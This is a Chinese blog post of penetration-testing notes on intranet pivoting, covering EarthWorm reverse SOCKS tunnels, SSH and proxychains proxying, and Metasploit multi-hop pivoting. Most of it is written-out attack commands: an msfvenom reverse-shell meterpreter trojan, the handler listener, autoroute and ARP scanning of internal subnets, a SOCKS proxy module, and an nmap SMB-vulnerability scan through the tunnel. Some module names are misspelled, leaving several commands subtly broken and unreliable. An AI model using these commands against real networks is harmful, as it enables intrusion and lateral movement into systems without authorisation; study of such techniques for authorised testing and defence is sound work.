内网安全-内网穿透

真的学不了一点。。。2024-02-12 23:13

目录

内网渗透

Nc使用详解

Nc监听和探测

Nc传文件

termite内网穿透工具

ssh代理内网穿透

ssh配置socket代理

MSF多级网络穿透

内网渗透

Nc使用详解
Nc监听和探测
Nc传文件
termite内网穿透工具
bash 复制代码 
1、termite 之前叫ew    (可以进行正向连接,可以进行反向连接)
​
2、
靶机监听流量转发:
  ./ew_for_linux64 -s rcsocks -l 1111 -e 2222
  #将1111端口监听到的本地数据转发到 web服务器的2222端口
  # 通过1111端口,将本地流量转发出去
  #rcsocks、rssocks 用于反向连接
  #ssocks 用于正向连接
  # -l 指定本地监听的端口
  # -e 指定要反弹到的机器端口
  # -d 指定要反弹到机器的IP
  # -f 指定要主动连接的机器 ip
  # -g 指定要主动连接的机器端口
  # -t 指定超时时长,默认为 1000
  
  root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d lhost -e 2222
rssocks 192.168.12.128:2222 <--[10000 usec]--> socks server
​
监听机的流量转发:
#将流量通过2222端口传到192.168.16.128主机上
#rcsocks、rssocks 用于反向连接
  #ssocks 用于正向连接
  # -l 指定本地监听的端口
  # -e 指定要反弹到的机器端口
  # -d 指定要反弹到机器的IP
  # -f 指定要主动连接的机器 ip
  # -g 指定要主动连接的机器端口
  # -t 指定超时时长,默认为 1000
  
3、windows和linux差不多!
ssh代理内网穿透
复制代码 
正向代理就是利用已经控制的主机来控制更多的主机,主机可能存在内网网卡,可以通过内网穿透工具来控制内网主机! ​ 反向代理就是在本地开启一个端口,通过ssh服务把端口映射到跳板机的ssh服务器的内网ip端口上,这样内网主机就可以直接访问我们本地主机服务!
ssh配置socket代理
bash 复制代码 
1、当然我们需要在 /etc/proxychains4.conf 文件里面修改代理端口
我们就可以直接使用本地流量进行攻击!

┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks" | tail -1
socks5  127.0.0.1 8081

代理完成之后就可以使用本地流量进行内网信息收集了
MSF多级网络穿透
bash 复制代码 
1、可以先控制web主机。直接生成监听木马,然后利用web主机的漏洞从而获取到meterpreter!
msfvenom -p windwos/meterpreter/reverse_tcp lhost=本地监听IP lport=本地监听端口 -f exe > shell.exe
-p:指定payload
-f:指定生成木马类型

2、msfconsole 监听模块
use exploit/multi/handler
set payload windwos/meterpreter/reverse_tcp
set lhost 本地监听IP
set lport 本地监听端口  (这几个参数要和生成的木马一样!!)
在web主机上运行shell.exe即可!

3、添加内网静态路由
run autoroute -s 内网IP网段
然后就可以扫描该网段了
run post/windwos/gather/arp_scanner RHOSTS=内网IP网段
当然我们也可以使用msf自带的端口扫描模块(auxiliary/scanner/portscan/tcp)

4、socks5代理
如果我们想在本地使用扫描器来进行内网信息收集,我们就可以利用msf的socks5代理设置,前提是我们已经拿到了web主机的meterpreter了!
use auxiliary/server/socks_unc
set srvhost 127.0.0.1
set srvport 1234
run

┌──(root㉿ru)-[~/kali]
└─# netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:45163         0.0.0.0:*               LISTEN      1150/containerd
tcp        0      0 0.0.0.0:1234            0.0.0.0:*               LISTEN      19399/ruby
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1174/sshd: /usr/sbi
tcp6       0      0 :::22

┌──(root㉿ru)-[~/kali]
└─# cat /etc/proxychains4.conf | grep "socks5" | tail -1
socks5  127.0.0.1 1234

这样我们就搞定了
nmap:
proxychains4 nmap -sT -sV -Pn -n -p 22,80,135,139,3389,445  --script=smb-vuln-ms* 内网IP  (正向扫描)

在此之后,我们再次进行msf漏洞攻击的时候就必须使用正向的payload了!
复制代码
相关推荐
Dawndddddd15 分钟前
网络安全之攻防笔记--通用安全漏洞SQL注入&sqlmap&Oracle&mongodb&DB2
笔记·sql·安全·web安全
Werqy31 小时前
burpsuite保姆级安装教程
网络安全
AI服务老曹13 小时前
运用先进的智能算法和优化模型,进行科学合理调度的智慧园区开源了
运维·人工智能·安全·开源·音视频
网络安全King14 小时前
华为 网络安全 认证
安全·web安全
网络安全-老纪15 小时前
网络安全-js安全知识点与XSS常用payloads
javascript·安全·web安全
API_technology15 小时前
电商API安全防护:JWT令牌与XSS防御实战
前端·安全·xss
underatted15 小时前
2025tg最新免费社工库机器人
web安全·网络安全
Tipray200616 小时前
天 锐 蓝盾终端安全管理系统:办公U盘拷贝使用管控限制
安全
坚定信念,勇往无前19 小时前
Spring Boot 如何保证接口安全
spring boot·后端·安全
H轨迹H20 小时前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权
网络安全·渗透测试·vulnhub·靶机·web漏洞·oscp
热门推荐
01DeepSeek各版本说明与优缺点分析02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek本地部署详细指南04太炸裂了!清华大学deepseek从入门到精通使用手册又出第三版了,《普通人如何抓住DeepSeek红利》(无套路,直接下载)05本地部署DeepSeek教程(Mac版本)06DeepSeek r1本地安装全指南07DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具08本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程09在Windows下安装Ollama并体验DeepSeek r1大模型10DeepSeek RAGFlow构建本地知识库系统